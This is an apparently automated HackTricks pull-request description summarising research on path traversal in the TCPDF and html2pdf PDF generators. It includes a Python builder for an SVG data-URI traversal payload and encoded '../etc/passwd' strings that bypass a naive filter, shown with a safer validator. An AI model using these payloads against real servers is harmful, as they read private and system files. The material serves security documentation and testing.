@carlospolop
Collaborator

🤖 Automated Content Update

This PR was automatically generated by the HackTricks News Bot based on a technical blog post.

📝 Source Information

🎯 Content Summary

This blog post presents a deep-dive into security issues in HTML-to-PDF generators, focusing on the PHP libraries tecnickcom/TCPDF and spipu/html2pdf. The authors build a clear threat model: a PDF renderer typically sits at a trust boundary, parsing attacker-controlled HTML, loading images, SVGs, fonts, certificates, and external CSS, while having access to the local filesystem and internal network. They use two concrete files on the server to demonstrate impact:

🔧 Technical Details

1. Path traversal via SVG xlink:href in PDF engines
If a PDF library accepts untrusted HTML with embedded SVGs, and its SVG handler reads <image xlink:href="..."> into a filesystem path without robust traversal checks, an attacker can reference files with sequences like ../../... By embedding the SVG as a data URI (e.g. <img src="data:image/svg;base64,...">), the attacker can cause the renderer to load local files (e.g. /tmp/user_files/user_1/private_image.png) and embed them into the PDF. Where libraries prepend DOCUMENT_ROOT to paths starting with /, attackers can still use /../../.. to escape into arbitrary directories.
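For authorized testing, the payload shape described in this item can be sketched in Python as follows. This is a minimal illustration, not the blog authors' tooling: the function name `build_svg_img_payload`, the default dimensions, and the number of `../` segments are assumptions, while the target path and the `data:image/svg;base64,` prefix are taken from the description above.

```python
import base64
from xml.sax.saxutils import quoteattr


def build_svg_img_payload(href: str, width: int = 100, height: int = 100) -> str:
    """Wrap an SVG whose <image> points at `href` into an <img> data URI.

    Hypothetical helper for illustration; the name and defaults are assumptions.
    """
    # quoteattr() escapes the value and adds the surrounding quotes.
    svg = (
        '<svg xmlns="http://www.w3.org/2000/svg" '
        'xmlns:xlink="http://www.w3.org/1999/xlink" '
        f'width="{width}" height="{height}">'
        f'<image xlink:href={quoteattr(href)} width="{width}" height="{height}"/>'
        "</svg>"
    )
    encoded = base64.b64encode(svg.encode("utf-8")).decode("ascii")
    # MIME type as written in the description above.
    return f'<img src="data:image/svg;base64,{encoded}">'


# Leading "/" plus traversal, for engines that prepend DOCUMENT_ROOT.
# The traversal depth (three levels) is an assumption about the target layout.
payload = build_svg_img_payload("/../../../tmp/user_files/user_1/private_image.png")
```

Whether the referenced file ends up embedded in the generated PDF depends on the library version and its path checks, so the result should be confirmed against the specific renderer under test.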


2. Bypassing naive "../" filters with URL-encoding
Many libraries attempt to block traversal by checking if a string contains "../" before accessing the filesy...
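The weakness of a substring check can be illustrated with a short Python sketch. It is not code from TCPDF or html2pdf: `naive_check`, `safer_check`, and `BASE_DIR` are hypothetical names, and the safer variant is only one possible approach (decode until stable, normalize, then verify the result stays under an allowed base directory).

```python
import posixpath
from urllib.parse import unquote

BASE_DIR = "/var/www/html"  # hypothetical allowed root, an assumption


def naive_check(path: str) -> bool:
    """Mimics a filter that only looks for a literal '../' substring."""
    return "../" not in path


def safer_check(path: str, base: str = BASE_DIR, max_rounds: int = 5) -> bool:
    """Decode repeatedly, normalize, and require the result to stay under base."""
    decoded = path
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break  # fully decoded
        decoded = nxt
    else:
        return False  # still changing after max_rounds: treat as hostile
    resolved = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    return resolved == base or resolved.startswith(base + "/")


single = "..%2f..%2f..%2fetc/passwd"   # URL-encoded slashes
double = "..%252f..%252fetc/passwd"    # double-encoded slashes

print(naive_check(single), safer_check(single))
print(naive_check(double), safer_check(double))
print(naive_check("images/logo.png"), safer_check("images/logo.png"))
```

Both encoded inputs pass the literal `../` check because the slash only appears after decoding, which is why validation is better performed on the final, canonical path than on the raw string.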

🤖 Agent Actions

Summary:

  • Expanded File Inclusion/Path Traversal guidance with a new “HTML-to-PDF SVG/IMG path traversal” section covering TCPDF/html2pdf attack surface, inline SVG payloads, traversal encoding bypasses, and multi-stage decoding tricks, plus added the Positive Technologies blog to the references.
  • Documented a new blind SSRF primitive on the SSRF page that leverages HTML-to-PDF renderers for internal HTTP probing, including payload examples, mitigation notes, a cross-link back to the new path-traversal section, and referenced the research blog.
  • Enhanced the PHP Deserialization + Autoload Classes page with a TCPDF destructor POP-chain walkthrough, a serialized payload example, an html2pdf/phar exploitation workflow, and added the same research reference via a new “References” section.

Tests: Not run (documentation-only changes).


This PR was automatically created by the HackTricks Feed Bot. Please review the changes carefully before merging.

@carlospolop
Collaborator Author

🔗 Additional Context

Original Blog Post: https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/

Content Categories: Based on the analysis, this content was categorized under "Pentesting Web -> File Inclusion/Path Traversal" (adding SVG/HTML-to-PDF path traversal and encoding bypasses) and cross-linked in "Pentesting Web -> SSRF" and "Pentesting Web -> Deserialization / PHP Tricks" (Phar POP chains via filesystem functions).

Repository Maintenance:

  • MD Files Formatting: 936 files processed

Review Notes:

  • This content was automatically processed and may require human review for accuracy
  • Check that the placement within the repository structure is appropriate
  • Verify that all technical details are correct and up-to-date
  • All .md files have been checked for proper formatting (headers, includes, etc.)

Bot Version: HackTricks News Bot v1.0
